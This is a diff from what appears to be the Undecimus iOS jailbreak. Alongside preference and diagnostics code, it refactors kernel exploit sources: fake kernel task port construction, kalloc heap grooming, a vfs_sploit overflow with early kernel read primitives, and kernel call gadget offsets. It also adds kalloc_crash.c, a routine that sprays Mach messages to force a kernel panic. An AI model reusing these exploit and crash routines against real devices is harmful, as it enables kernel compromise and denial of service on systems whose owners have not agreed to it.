 - (IBAction)reloadSystemDaemonsSwitchTriggered:(id)sender {
-    [[NSUserDefaults standardUserDefaults] setBool:[self.ReloadSystemDaemonsSwitch isOn] forKey:K_RELOAD_SYSTEM_DAEMONS];
-    [[NSUserDefaults standardUserDefaults] synchronize];
+    auto prefs = copy_prefs();
+    prefs->reload_system_daemons = (bool)self.ReloadSystemDaemonsSwitch.isOn;
+    set_prefs(prefs);
+    release_prefs(&prefs);
     [self reloadData];
 }
 
 - (IBAction)tappedRestartSpringBoard:(id)sender {
-    dispatch_async(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_HIGH, 0ul), ^{
-        SETMESSAGE(NSLocalizedString(@"Failed to restart SpringBoard.", nil));
-        NOTICE(NSLocalizedString(@"SpringBoard will be restarted.", nil), true, false);
-        NSInteger support = recommendedRespringSupport();
-        _assert(support != -1, message, true);
+    auto const block = ^(void) {
+        notice(localize(@"SpringBoard will be restarted."), true, false);
+        auto const support = recommendedRespringSupport();
         switch (support) {
             case deja_xnu_exploit: {
-                mach_port_t bb_tp = hid_event_queue_exploit();
-                _assert(MACH_PORT_VALID(bb_tp), message, true);
-                _assert(thread_call_remote(bb_tp, exit, 1, REMOTE_LITERAL(EXIT_SUCCESS)) == ERR_SUCCESS, message, true);
+                auto const bb_tp = hid_event_queue_exploit();
+                _assert(MACH_PORT_VALID(bb_tp), localize(@"Unable to get task port for backboardd."), true);
+                _assert(thread_call_remote(bb_tp, exit, 1, REMOTE_LITERAL(EXIT_SUCCESS)) == ERR_SUCCESS, localize(@"Unable to make backboardd exit."), true);
                 break;
             }
             default:
                 break;
         }
         exit(EXIT_FAILURE);
-    });
+    };
+    dispatch_async(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_HIGH, 0ul), block);
 }
 
 - (IBAction)tappedOnCleanDiagnosticsData:(id)sender {
     cleanLogs();
-    NOTICE(NSLocalizedString(@"Cleaned diagnostics data.", nil), false, false);
+    notice(localize(@"Cleaned diagnostics data."), false, false);
 }
 
 - (IBAction)hideLogWindowSwitchTriggered:(id)sender {
-    [[NSUserDefaults standardUserDefaults] setBool:[self.HideLogWindowSwitch isOn] forKey:K_HIDE_LOG_WINDOW];
-    [[NSUserDefaults standardUserDefaults] synchronize];
+    auto prefs = copy_prefs();
+    prefs->hide_log_window = (bool)self.HideLogWindowSwitch.isOn;
+    set_prefs(prefs);
+    release_prefs(&prefs);
     [self reloadData];
-    dispatch_async(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_HIGH, 0ul), ^{
-        NOTICE(NSLocalizedString(@"Preference was changed. The app will now exit.", nil), true, false);
+    auto const block = ^(void) {
+        notice(localize(@"Preference was changed. The app will now exit."), true, false);
         exit(EXIT_SUCCESS);
-    });
+    };
+    dispatch_async(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_HIGH, 0ul), block);
 }
 
 - (IBAction)resetCydiaCacheSwitchTriggered:(id)sender {
-    [[NSUserDefaults standardUserDefaults] setBool:[self.ResetCydiaCacheSwitch isOn] forKey:K_RESET_CYDIA_CACHE];
-    [[NSUserDefaults standardUserDefaults] synchronize];
+    auto prefs = copy_prefs();
+    prefs->reset_cydia_cache = (bool)self.ResetCydiaCacheSwitch.isOn;
+    set_prefs(prefs);
+    release_prefs(&prefs);
     [self reloadData];
 }
 
+- (IBAction)sshOnlySwitchTriggered:(id)sender {
+    auto prefs = copy_prefs();
+    prefs->ssh_only = (bool)self.SSHOnlySwitch.isOn;
+    set_prefs(prefs);
+    release_prefs(&prefs);
+    [self reloadData];
+}
+
+- (IBAction)enableGetTaskAllowSwitchTriggered:(id)sender {
+    auto prefs = copy_prefs();
+    prefs->enable_get_task_allow = (bool)self.EnableGetTaskAllowSwitch.isOn;
+    set_prefs(prefs);
+    release_prefs(&prefs);
+    [self reloadData];
+}
+
+- (IBAction)setCSDebugged:(id)sender {
+    auto prefs = copy_prefs();
+    prefs->set_cs_debugged = (bool)self.SetCSDebuggedSwitch.isOn;
+    set_prefs(prefs);
+    release_prefs(&prefs);
+    [self reloadData];
+}
+
+- (IBAction)tappedOnResetAppPreferences:(id)sender {
+    auto const block = ^(void) {
+        reset_prefs();
+        notice(localize(@"Preferences were reset. The app will now exit."), true, false);
+        exit(EXIT_SUCCESS);
+    };
+    dispatch_async(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_HIGH, 0ul), block);
+}
+
 - (void)didReceiveMemoryWarning {
     [super didReceiveMemoryWarning];
     // Dispose of any resources that can be recreated.

Undecimus/source/async_wake.c

@@ -10,7 +10,7 @@
 #include <CoreFoundation/CoreFoundation.h>
 
 #include "KernelMemory.h"
-#include "KernelStructureOffsets.h"
+#include "KernelOffsets.h"
 #include "KernelUtilities.h"
 #include "async_wake.h"
 #include "early_kalloc.h"
@@ -175,7 +175,7 @@ mach_port_t* prepare_ports(int n_ports)
             for (int j = 0; j < i; j++) {
                 mach_port_deallocate(mach_task_self(), ports[j]);
             }
-            free(ports);
+            SafeFreeNULL(ports);
             return NULL;
         }
     }
@@ -374,7 +374,7 @@ mach_port_t build_safe_fake_tfp0(uint64_t vm_map, uint64_t space)
     *(uint64_t*)(fake_kernel_task + koffset(KSTRUCT_OFFSET_TASK_VM_MAP)) = vm_map;
     *(uint8_t*)(fake_kernel_task + koffset(KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE)) = 0x22;
     kmemcpy(fake_kernel_task_kaddr, (uint64_t)fake_kernel_task, 0x1000);
-    free(fake_kernel_task);
+    SafeFreeNULL(fake_kernel_task);
 
     uint32_t fake_task_refs = ReadKernel32(fake_kernel_task_kaddr + koffset(KSTRUCT_OFFSET_TASK_REF_COUNT));
     LOG("read fake_task_refs: %x", fake_task_refs);
@@ -590,7 +590,7 @@ mach_port_t get_kernel_memory_rw()
     // now free first replacer and put a fake kernel task port there
     // we need to do this becase the first time around we don't know the address
     // of ipc_space_kernel which means we can't fake a port owned by the kernel
-    free(replacer_message_body);
+    SafeFreeNULL(replacer_message_body);
     replacer_message_body = build_message_payload(first_port_address, replacer_body_size, message_body_offset, kernel_vm_map, ipc_space_kernel(), &context_ptr);
     if (replacer_message_body == NULL) {
         return MACH_PORT_NULL;

Undecimus/source/diagnostics.h

@@ -0,0 +1,23 @@
+//
+//  diagnostics.h
+//  Undecimus
+//
+//  Created by Pwn20wnd on 5/3/19.
+//  Copyright © 2019 Pwn20wnd. All rights reserved.
+//
+
+#ifndef diagnostics_h
+#define diagnostics_h
+
+#include <Foundation/Foundation.h>
+
+#define STATUS_FILE @"/var/lib/dpkg/status"
+#define CYDIA_LIST @"/etc/apt/sources.list.d/cydia.list"
+
+NSArray *dependencyArrayFromString(NSString *depends);
+NSArray *parsedPackageArray(void);
+NSString *domainFromRepoObject(NSString *repoObject);
+NSArray *sourcesFromFile(NSString *theSourceFile);
+NSDictionary *getDiagnostics(void);
+
+#endif /* diagnostics_h */

Undecimus/source/diagnostics.m

@@ -0,0 +1,147 @@
+//
+//  diagnostics.c
+//  Undecimus
+//
+//  Created by Pwn20wnd on 5/3/19.
+//  Copyright © 2019 Pwn20wnd. All rights reserved.
+//
+
+#include "diagnostics.h"
+#include <common.h>
+#include <sys/utsname.h>
+#include <sys/sysctl.h>
+#include "utils.h"
+#include "prefs.h"
+
+#if 0
+Credits:
+- https://github.com/lechium/nitoTV/blob/53cca06514e79279fa89639ad05b562f7d730079/Classes/packageManagement.m#L1138
+- https://github.com/lechium/nitoTV/blob/53cca06514e79279fa89639ad05b562f7d730079/Classes/packageManagement.m#L1163
+- https://github.com/lechium/nitoTV/blob/53cca06514e79279fa89639ad05b562f7d730079/Classes/packageManagement.m#L854
+- https://github.com/lechium/nitoTV/blob/53cca06514e79279fa89639ad05b562f7d730079/Classes/packageManagement.m#L869
+#endif
+
+NSArray *dependencyArrayFromString(NSString *depends) {
+    NSMutableArray *cleanArray = [NSMutableArray new];
+    NSArray *dependsArray = [depends componentsSeparatedByString:@","];
+    for (NSString *depend in dependsArray) {
+        NSArray *spaceDelimitedArray = [depend componentsSeparatedByString:@" "];
+        NSString *isolatedDependency = [[spaceDelimitedArray objectAtIndex:0] stringByTrimmingCharactersInSet:[NSCharacterSet whitespaceAndNewlineCharacterSet]];
+        if ([isolatedDependency length] == 0) {
+            isolatedDependency = [[spaceDelimitedArray objectAtIndex:1] stringByTrimmingCharactersInSet:[NSCharacterSet whitespaceAndNewlineCharacterSet]];
+        }
+        [cleanArray addObject:isolatedDependency];
+    }
+    return cleanArray;
+}
+
+NSArray *parsedPackageArray() {
+    NSString *packageString = [NSString stringWithContentsOfFile:STATUS_FILE encoding:NSUTF8StringEncoding error:nil];
+    NSArray *lineArray = [packageString componentsSeparatedByString:@"\n\n"];
+    NSMutableArray *mutableList = [[NSMutableArray alloc] init];
+    for (NSString *currentItem in lineArray) {
+        NSArray *packageArray = [currentItem componentsSeparatedByString:@"\n"];
+        NSMutableDictionary *currentPackage = [[NSMutableDictionary alloc] init];
+        for (NSString *currentLine in packageArray) {
+            NSArray *itemArray = [currentLine componentsSeparatedByString:@": "];
+            if ([itemArray count] >= 2) {
+                NSString *key = [itemArray objectAtIndex:0];
+                NSString *object = [itemArray objectAtIndex:1];
+                if ([key isEqualToString:@"Depends"]) {
+                    NSArray *dependsObject = dependencyArrayFromString(object);
+                    [currentPackage setObject:dependsObject forKey:key];
+                } else {
+                    [currentPackage setObject:object forKey:key];
+                }
+            }
+        }
+        if ([[currentPackage allKeys] count] > 4) {
+            [mutableList addObject:currentPackage];
+        }
+        currentPackage = nil;
+    }
+    NSSortDescriptor *nameDescriptor = [[NSSortDescriptor alloc] initWithKey:@"Name" ascending:YES selector:@selector(localizedCaseInsensitiveCompare:)];
+    NSSortDescriptor *packageDescriptor = [[NSSortDescriptor alloc] initWithKey:@"Package" ascending:YES selector:@selector(localizedCaseInsensitiveCompare:)];
+    NSArray *descriptors = [NSArray arrayWithObjects:nameDescriptor, packageDescriptor, nil];
+    NSArray *sortedArray = [mutableList sortedArrayUsingDescriptors:descriptors];
+    mutableList = nil;
+    return sortedArray;
+}
+
+NSString *domainFromRepoObject(NSString *repoObject) {
+    if ([repoObject length] == 0) return nil;
+    NSArray *sourceObjectArray = [repoObject componentsSeparatedByString:@" "];
+    NSString *url = [sourceObjectArray objectAtIndex:1];
+    if ([url length] > 7) {
+        NSString *urlClean = [url substringFromIndex:7];
+        NSArray *secondArray = [urlClean componentsSeparatedByString:@"/"];
+        return [secondArray objectAtIndex:0];
+    }
+    return nil;
+}
+
+NSArray *sourcesFromFile(NSString *theSourceFile) {
+    NSMutableArray *finalArray = [NSMutableArray new];
+    NSString *sourceString = [[NSString stringWithContentsOfFile:theSourceFile encoding:NSASCIIStringEncoding error:nil] stringByTrimmingCharactersInSet:[NSCharacterSet whitespaceAndNewlineCharacterSet]];
+    NSArray *sourceFullArray =  [sourceString componentsSeparatedByString:@"\n"];
+    NSEnumerator *sourceEnum = [sourceFullArray objectEnumerator];
+    NSString *currentSource = nil;
+    while (currentSource = [sourceEnum nextObject]) {
+        NSString *theObject = domainFromRepoObject(currentSource);
+        if (theObject != nil) {
+            if (![finalArray containsObject:theObject])
+                [finalArray addObject:theObject];
+        }
+    }
+    return finalArray;
+}
+
+NSDictionary *getDiagnostics() {
+    NSMutableDictionary *diagnostics = [NSMutableDictionary new];
+    char *OSVersion = getOSVersion();
+    assert(OSVersion != NULL);
+    char *OSProductVersion = getOSProductVersion();
+    assert(OSProductVersion != NULL);
+    char *kernelVersion = getKernelVersion();
+    assert(kernelVersion != NULL);
+    char *machineName = getMachineName();
+    assert(machineName != NULL);
+    prefs_t *prefs = copy_prefs();
+    diagnostics[@"OSVersion"] = [NSString stringWithUTF8String:OSVersion];
+    diagnostics[@"OSProductVersion"] = [NSString stringWithUTF8String:OSProductVersion];
+    diagnostics[@"KernelVersion"] = [NSString stringWithUTF8String:kernelVersion];
+    diagnostics[@"MachineName"] = [NSString stringWithUTF8String:machineName];
+    diagnostics[@"Preferences"] = [NSMutableDictionary new];
+    diagnostics[@"Preferences"][@K_TWEAK_INJECTION] = [NSNumber numberWithBool:(BOOL)prefs->load_tweaks];
+    diagnostics[@"Preferences"][@K_LOAD_DAEMONS] = [NSNumber numberWithBool:(BOOL)prefs->load_daemons];
+    diagnostics[@"Preferences"][@K_DUMP_APTICKET] = [NSNumber numberWithBool:(BOOL)prefs->dump_apticket];
+    diagnostics[@"Preferences"][@K_REFRESH_ICON_CACHE] = [NSNumber numberWithBool:(BOOL)prefs->run_uicache];
+    diagnostics[@"Preferences"][@K_BOOT_NONCE] = [NSString stringWithUTF8String:(const char *)prefs->boot_nonce];
+    diagnostics[@"Preferences"][@K_DISABLE_AUTO_UPDATES] = [NSNumber numberWithBool:(BOOL)prefs->disable_auto_updates];
+    diagnostics[@"Preferences"][@K_DISABLE_APP_REVOKES] = [NSNumber numberWithBool:(BOOL)prefs->disable_app_revokes];
+    diagnostics[@"Preferences"][@K_OVERWRITE_BOOT_NONCE] = [NSNumber numberWithBool:(BOOL)prefs->overwrite_boot_nonce];
+    diagnostics[@"Preferences"][@K_EXPORT_KERNEL_TASK_PORT] = [NSNumber numberWithBool:(BOOL)prefs->export_kernel_task_port];
+    diagnostics[@"Preferences"][@K_RESTORE_ROOTFS] = [NSNumber numberWithBool:(BOOL)prefs->restore_rootfs];
+    diagnostics[@"Preferences"][@K_INCREASE_MEMORY_LIMIT] = [NSNumber numberWithBool:(BOOL)prefs->increase_memory_limit];
+    diagnostics[@"Preferences"][@K_ECID] = [NSString stringWithUTF8String:(const char *)prefs->ecid];
+    diagnostics[@"Preferences"][@K_INSTALL_CYDIA] = [NSNumber numberWithBool:(BOOL)prefs->install_cydia];
+    diagnostics[@"Preferences"][@K_INSTALL_OPENSSH] = [NSNumber numberWithBool:(BOOL)prefs->install_openssh];
+    diagnostics[@"Preferences"][@K_RELOAD_SYSTEM_DAEMONS] = [NSNumber numberWithBool:(BOOL)prefs->reload_system_daemons];
+    diagnostics[@"Preferences"][@K_RESET_CYDIA_CACHE] = [NSNumber numberWithBool:(BOOL)prefs->reset_cydia_cache];
+    diagnostics[@"Preferences"][@K_SSH_ONLY] = [NSNumber numberWithBool:(BOOL)prefs->ssh_only];
+    diagnostics[@"Preferences"][@K_ENABLE_GET_TASK_ALLOW] = [NSNumber numberWithBool:(BOOL)prefs->enable_get_task_allow];
+    diagnostics[@"Preferences"][@K_SET_CS_DEBUGGED] = [NSNumber numberWithBool:(BOOL)prefs->set_cs_debugged];
+    diagnostics[@"Preferences"][@K_HIDE_LOG_WINDOW] = [NSNumber numberWithBool:(BOOL)prefs->hide_log_window];
+    diagnostics[@"Preferences"][@K_EXPLOIT] = [NSNumber numberWithInt:(int)prefs->exploit];
+    diagnostics[@"AppVersion"] = [NSString stringWithString:appVersion()];
+    diagnostics[@"LogFile"] = [NSString stringWithContentsOfFile:getLogFile() encoding:NSUTF8StringEncoding error:nil];
+    diagnostics[@"Sources"] = [NSArray arrayWithArray:sourcesFromFile(CYDIA_LIST)];
+    diagnostics[@"Packages"] = [NSArray arrayWithArray:parsedPackageArray()];
+    diagnostics[@"Uptime"] = [NSNumber numberWithDouble:getUptime()];
+    SafeFreeNULL(OSVersion);
+    SafeFreeNULL(OSProductVersion);
+    SafeFreeNULL(kernelVersion);
+    SafeFreeNULL(machineName);
+    release_prefs(&prefs);
+    return diagnostics;
+}

Undecimus/source/early_kalloc.c

@@ -13,7 +13,7 @@
 #include <stdlib.h>
 
 #include "KernelMemory.h"
-#include "KernelStructureOffsets.h"
+#include "KernelOffsets.h"
 #include "KernelUtilities.h"
 #include "find_port.h"
 #include <common.h>

Undecimus/source/empty_list_sploit.c

@@ -12,7 +12,7 @@
 #include <mach/mach.h>
 
 #include "KernelMemory.h"
-#include "KernelStructureOffsets.h"
+#include "KernelOffsets.h"
 #include "KernelUtilities.h"
 #include "empty_list_sploit.h"
 #include <common.h>
@@ -81,10 +81,10 @@ static void build_fake_task_port(uint8_t* fake_port, uint64_t fake_port_kaddr, u
 }
 
 #define N_EARLY_PORTS 80000
-mach_port_t early_ports[N_EARLY_PORTS + 20000];
-int next_early_port = 0;
+static mach_port_t early_ports[N_EARLY_PORTS + 20000];
+static int next_early_port = 0;
 
-void alloc_early_ports()
+static void alloc_early_ports()
 {
     for (int i = 0; i < N_EARLY_PORTS; i++) {
         kern_return_t err;
@@ -96,7 +96,7 @@ void alloc_early_ports()
     next_early_port = N_EARLY_PORTS - 1;
 }
 
-mach_port_t steal_early_port()
+static mach_port_t steal_early_port()
 {
     if (next_early_port == 0) {
         LOG("out of early ports");
@@ -108,14 +108,14 @@ mach_port_t steal_early_port()
     return p;
 }
 
-void dump_early_ports()
+static void dump_early_ports()
 {
     for (int i = 0; i < N_EARLY_PORTS; i++) {
         LOG("EARLY %d %08x", i, early_ports[i]);
     }
 }
 
-void clear_early_ports()
+static void clear_early_ports()
 {
     for (int i = 0; i < next_early_port; i++) {
         mach_port_destroy(mach_task_self(), early_ports[i]);
@@ -129,7 +129,7 @@ struct kalloc_16_send_msg {
     uint8_t pad[0x200];
 };
 
-mach_port_t kalloc_16()
+static mach_port_t kalloc_16()
 {
     kern_return_t err;
     // take an early port:
@@ -175,10 +175,10 @@ mach_port_t kalloc_16()
 }
 
 #define N_MIDDLE_PORTS 50000
-mach_port_t middle_ports[N_MIDDLE_PORTS];
-int next_middle_port = 0;
+static mach_port_t middle_ports[N_MIDDLE_PORTS];
+static int next_middle_port = 0;
 
-mach_port_t alloc_middle_port()
+static mach_port_t alloc_middle_port()
 {
     mach_port_t port;
     kern_return_t err;
@@ -198,7 +198,7 @@ struct ool_multi_msg {
 };
 
 // to free them either receive the message or destroy the port
-mach_port_t hold_kallocs(uint32_t kalloc_size, int allocs_per_message, int messages_to_send, mach_port_t holder_port, mach_port_t* source_ports)
+static mach_port_t hold_kallocs(uint32_t kalloc_size, int allocs_per_message, int messages_to_send, mach_port_t holder_port, mach_port_t* source_ports)
 {
     if (messages_to_send > MACH_PORT_QLIMIT_LARGE) {
         LOG("****************** too many messages");
@@ -271,14 +271,14 @@ mach_port_t hold_kallocs(uint32_t kalloc_size, int allocs_per_message, int messa
             //return false;
         }
     }
-    free(ports_to_send);
-    free(msg);
+    SafeFreeNULL(ports_to_send);
+    SafeFreeNULL(msg);
 
     return port;
 }
 
-uint8_t msg_buf[10000];
-void discard_message(mach_port_t port)
+static uint8_t msg_buf[10000];
+static void discard_message(mach_port_t port)
 {
     mach_msg_header_t* msg = (mach_msg_header_t*)msg_buf;
     kern_return_t err;
@@ -298,12 +298,12 @@ void discard_message(mach_port_t port)
 
 #include <sys/attr.h>
 
-int vfs_fd = -1;
-struct attrlist al = { 0 };
-size_t attrBufSize = 16;
-void* attrBuf = NULL;
+static int vfs_fd = -1;
+static struct attrlist al = { 0 };
+static size_t attrBufSize = 16;
+static void* attrBuf = NULL;
 
-void prepare_vfs_overflow()
+static void prepare_vfs_overflow()
 {
     vfs_fd = open("/", O_RDONLY);
     if (vfs_fd == -1) {
@@ -319,23 +319,23 @@ void prepare_vfs_overflow()
 }
 
 // this will do a kalloc.16, overflow out of it with 8 NULL bytes, then free it
-void do_vfs_overflow()
+static void do_vfs_overflow()
 {
     int options = 0;
     int err = fgetattrlist(vfs_fd, &al, attrBuf, attrBufSize, options);
     //LOG("err: %d", err);
 }
 
-mach_port_t initial_early_kallocs[80000];
-int next_early_kalloc = 0;
+static mach_port_t initial_early_kallocs[80000];
+static int next_early_kalloc = 0;
 
-mach_port_t middle_kallocs[80000];
-int next_middle_kalloc = 0;
+static mach_port_t middle_kallocs[80000];
+static int next_middle_kalloc = 0;
 
 // in the end I don't use these, but maybe they help?
 
-volatile int keep_spinning = 1;
-void* spinner(void* arg)
+static volatile int keep_spinning = 1;
+static void* spinner(void* arg)
 {
     while (keep_spinning)
         ;
@@ -343,9 +343,9 @@ void* spinner(void* arg)
 }
 
 #define N_SPINNERS 100
-pthread_t spin_threads[N_SPINNERS];
+static pthread_t spin_threads[N_SPINNERS];
 
-void start_spinners()
+static void start_spinners()
 {
     return;
     for (int i = 0; i < N_SPINNERS; i++) {
@@ -353,7 +353,7 @@ void start_spinners()
     }
 }
 
-void stop_spinners()
+static void stop_spinners()
 {
     return;
     keep_spinning = 0;
@@ -362,15 +362,15 @@ void stop_spinners()
     }
 }
 
-const int total_fds = 14 * 0x1f * 8;
-int read_ends[total_fds];
-int write_ends[total_fds];
-int next_pipe_index = 0;
+static const int total_fds = 14 * 0x1f * 8;
+static int read_ends[total_fds];
+static int write_ends[total_fds];
+static int next_pipe_index = 0;
 
 static mach_port_t early_read_port = MACH_PORT_NULL;
-int early_read_read_fd = -1;
-int early_read_write_fd = -1;
-uint64_t early_read_known_kaddr = 0;
+static int early_read_read_fd = -1;
+static int early_read_write_fd = -1;
+static uint64_t early_read_known_kaddr = 0;
 
 // read_fd and write_fd are the pipe fds which have a pipe buffer at known_addr
 static void prepare_early_read_primitive(mach_port_t target_port, int read_fd, int write_fd, uint64_t known_kaddr)
@@ -381,7 +381,7 @@ static void prepare_early_read_primitive(mach_port_t target_port, int read_fd, i
     early_read_known_kaddr = known_kaddr;
 }
 
-uint32_t early_rk32(uint64_t kaddr)
+static uint32_t early_rk32(uint64_t kaddr)
 {
     uint8_t* buf = malloc(0xfff);
     read(early_read_read_fd, buf, 0xfff);
@@ -394,11 +394,11 @@ uint32_t early_rk32(uint64_t kaddr)
         LOG("pid_for_task returned %x (%s)", err, mach_error_string(err));
     }
     LOG("read val via pid_for_task: %08x", val);
-    free(buf);
+    SafeFreeNULL(buf);
     return val;
 }
 
-uint64_t early_rk64(uint64_t kaddr)
+static uint64_t early_rk64(uint64_t kaddr)
 {
     uint64_t lower = (uint64_t)early_rk32(kaddr);
     uint64_t upper = (uint64_t)early_rk32(kaddr + 4);
@@ -415,7 +415,8 @@ bool vfs_sploit()
     increase_limits();
 
     size_t kernel_page_size = 0;
-    host_page_size(mach_host_self(), &kernel_page_size);
+    host_t host = mach_host_self();
+    host_page_size(host, &kernel_page_size);
     if (kernel_page_size == 0x4000) {
         LOG("this device uses 16k kernel pages");
     } else if (kernel_page_size == 0x1000) {
@@ -809,8 +810,8 @@ bool vfs_sploit()
             break;
         }
     }
-    free(old_contents);
-    free(new_contents);
+    SafeFreeNULL(old_contents);
+    SafeFreeNULL(new_contents);
     if (pipe_target_kaddr_replacer_index == -1) {
         LOG("failed to find the pipe_target_kaddr_replacer pipe");
     }
@@ -829,7 +830,7 @@ bool vfs_sploit()
     host_msg.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, MACH_MSG_TYPE_COPY_SEND);
     host_msg.msgh_size = sizeof(host_msg);
     host_msg.msgh_remote_port = canary_port;
-    host_msg.msgh_local_port = mach_host_self();
+    host_msg.msgh_local_port = host;
     host_msg.msgh_id = 0x12344321;
 
     err = mach_msg(&host_msg,
@@ -1050,6 +1051,8 @@ bool vfs_sploit()
         close(write_ends[i]);
         close(read_ends[i]);
     }
+    
+    mach_port_deallocate(mach_task_self(), host);
 
     LOG("done!");
 

Undecimus/source/find_port.c

@@ -5,7 +5,7 @@
 #include <mach/mach.h>
 
 #include "KernelMemory.h"
-#include "KernelStructureOffsets.h"
+#include "KernelOffsets.h"
 #include "KernelUtilities.h"
 #include "find_port.h"
 #include <common.h>
@@ -228,7 +228,7 @@ uint64_t find_port_via_proc_pidlistuptrs_bug(mach_port_t port, int disposition)
 
     //LOG("best guess is: 0x%016llx with %d%% of the valid guesses for it", best_guess, (best_guess_count*100)/valid_guesses);
 
-    free(guesses);
+    SafeFreeNULL(guesses);
 
     return best_guess;
 }

Undecimus/source/jailbreak.h

@@ -0,0 +1,16 @@
+//
+//  jailbreak.h
+//  Undecimus
+//
+//  Created by Pwn20wnd on 5/11/19.
+//  Copyright © 2019 Pwn20wnd. All rights reserved.
+//
+
+#ifndef jailbreak_h
+#define jailbreak_h
+
+#include <stdio.h>
+
+void jailbreak(void);
+
+#endif /* jailbreak_h */

Undecimus/source/kalloc_crash.c

@@ -0,0 +1,90 @@
+//
+//  panic.c
+//  Undecimus
+//
+//  Created by Pwn20wnd on 4/20/19.
+//  Copyright © 2019 Pwn20wnd. All rights reserved.
+//
+
+#include <stdlib.h>
+#include <mach/mach.h>
+#include <common.h>
+#include "kalloc_crash.h"
+
+struct simple_msg
+{
+    mach_msg_header_t hdr;
+    char buf[0];
+};
+
+/* credits to ian beer */
+static mach_port_t send_kalloc_message(uint8_t *replacer_message_body, uint32_t replacer_body_size)
+{
+    // allocate a port to send the messages to
+    mach_port_t q = MACH_PORT_NULL;
+    kern_return_t err;
+    err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &q);
+    if (err != KERN_SUCCESS)
+    {
+        printf(" [-] failed to allocate port\n");
+        exit(EXIT_FAILURE);
+    }
+    
+    mach_port_limits_t limits = {0};
+    limits.mpl_qlimit = MACH_PORT_QLIMIT_LARGE;
+    err = mach_port_set_attributes(mach_task_self(),
+                                   q,
+                                   MACH_PORT_LIMITS_INFO,
+                                   (mach_port_info_t)&limits,
+                                   MACH_PORT_LIMITS_INFO_COUNT);
+    if (err != KERN_SUCCESS)
+    {
+        printf(" [-] failed to increase queue limit\n");
+        exit(EXIT_FAILURE);
+    }
+    
+    mach_msg_size_t msg_size = sizeof(struct simple_msg) + replacer_body_size;
+    struct simple_msg *msg = malloc(msg_size);
+    memset(msg, 0, sizeof(struct simple_msg));
+    memcpy(&msg->buf[0], replacer_message_body, replacer_body_size);
+    
+    for (int i = 0; i < 256; i++)
+    {
+        msg->hdr.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0);
+        msg->hdr.msgh_size = msg_size;
+        msg->hdr.msgh_remote_port = q;
+        msg->hdr.msgh_local_port = MACH_PORT_NULL;
+        msg->hdr.msgh_id = 0x41414142;
+        
+        err = mach_msg(&msg->hdr,
+                       MACH_SEND_MSG|MACH_MSG_OPTION_NONE,
+                       msg_size,
+                       0,
+                       MACH_PORT_NULL,
+                       MACH_MSG_TIMEOUT_NONE,
+                       MACH_PORT_NULL);
+        
+        if (err != KERN_SUCCESS)
+        {
+            printf(" [-] failed to send message %x (%d): %s\n", err, i, mach_error_string(err));
+            exit(EXIT_FAILURE);
+        }
+    }
+    
+    return q;
+}
+
+static uint32_t message_size_for_kalloc_size(uint32_t size)
+{
+    return ((size * 3) / 4) - 0x74;
+}
+
+void do_kalloc_crash() {
+    for (;;) {
+        uint32_t body_size = message_size_for_kalloc_size(16384) - sizeof(mach_msg_header_t); // 1024
+        uint8_t *body = malloc(body_size);
+        memset(body, 0x41, body_size);
+        send_kalloc_message(body, body_size);
+        SafeFreeNULL(body);
+    }
+}

Undecimus/source/kalloc_crash.h

@@ -0,0 +1,16 @@
+//
+//  panic.h
+//  Undecimus
+//
+//  Created by Pwn20wnd on 4/20/19.
+//  Copyright © 2019 Pwn20wnd. All rights reserved.
+//
+
+#ifndef panic_h
+#define panic_h
+
+#include <stdio.h>
+
+void do_kalloc_crash(void);
+
+#endif /* panic_h */

Undecimus/source/kc_parameters.c

@@ -0,0 +1,188 @@
+/*
+ * kernel_call/kc_parameters.c
+ * Brandon Azad
+ */
+#define KERNEL_CALL_PARAMETERS_EXTERN
+#include "kc_parameters.h"
+
+#include "kernel_slide.h"
+#include "log.h"
+#include "platform.h"
+#include "platform_match.h"
+#include "KernelUtilities.h"
+
+// ---- Initialization routines -------------------------------------------------------------------
+
+// A struct describing an initialization.
+struct initialization {
+	const char *devices;
+	const char *builds;
+	void (*init)(void);
+};
+
+// Run initializations matching this platform.
+static size_t
+run_initializations(struct initialization *inits, size_t count) {
+	size_t match_count = 0;
+	for (size_t i = 0; i < count; i++) {
+		struct initialization *init = &inits[i];
+		if (platform_matches(init->devices, init->builds)) {
+			init->init();
+			match_count++;
+		}
+	}
+	return match_count;
+}
+
+// A helper macro to get the number of elements in a static array.
+#define ARRAY_COUNT(x)	(sizeof(x) / sizeof((x)[0]))
+
+// ---- Offset initialization ---------------------------------------------------------------------
+
+static void
+offsets__iphone11_8__16C50() {
+	OFFSET(IOAudio2DeviceUserClient, traps) = 0x118;
+
+	SIZE(IOExternalTrap)             = 0x18;
+	OFFSET(IOExternalTrap, object)   =  0;
+	OFFSET(IOExternalTrap, function) =  8;
+	OFFSET(IOExternalTrap, offset)   = 16;
+
+	OFFSET(IORegistryEntry, reserved)                        = 16;
+	OFFSET(IORegistryEntry__ExpansionData, fRegistryEntryID) = 8;
+
+	VTABLE_INDEX(IOUserClient, getExternalTrapForIndex)  = 0x5B8 / 8;
+	VTABLE_INDEX(IOUserClient, getTargetAndTrapForIndex) = 0x5C0 / 8;
+}
+
+// A list of offset initializations by platform.
+static struct initialization offsets[] = {
+	{ "*", "*", offsets__iphone11_8__16C50 },
+};
+
+// ---- Address initialization --------------------------------------------------------------------
+
+#define SLIDE(address)		(address == 0 ? 0 : address + kernel_slide)
+
+static void
+addresses__iphone11_2__16A366() {
+    ADDRESS(paciza_pointer__l2tp_domain_module_start)       = getoffset(paciza_pointer__l2tp_domain_module_start);
+    ADDRESS(paciza_pointer__l2tp_domain_module_stop)        = getoffset(paciza_pointer__l2tp_domain_module_stop);
+    ADDRESS(l2tp_domain_inited)                             = getoffset(l2tp_domain_inited);
+    ADDRESS(sysctl__net_ppp_l2tp)                           = getoffset(sysctl__net_ppp_l2tp);
+    ADDRESS(sysctl_unregister_oid)                          = getoffset(sysctl_unregister_oid);
+    ADDRESS(mov_x0_x4__br_x5)                               = getoffset(mov_x0_x4__br_x5);
+    ADDRESS(mov_x9_x0__br_x1)                               = getoffset(mov_x9_x0__br_x1);
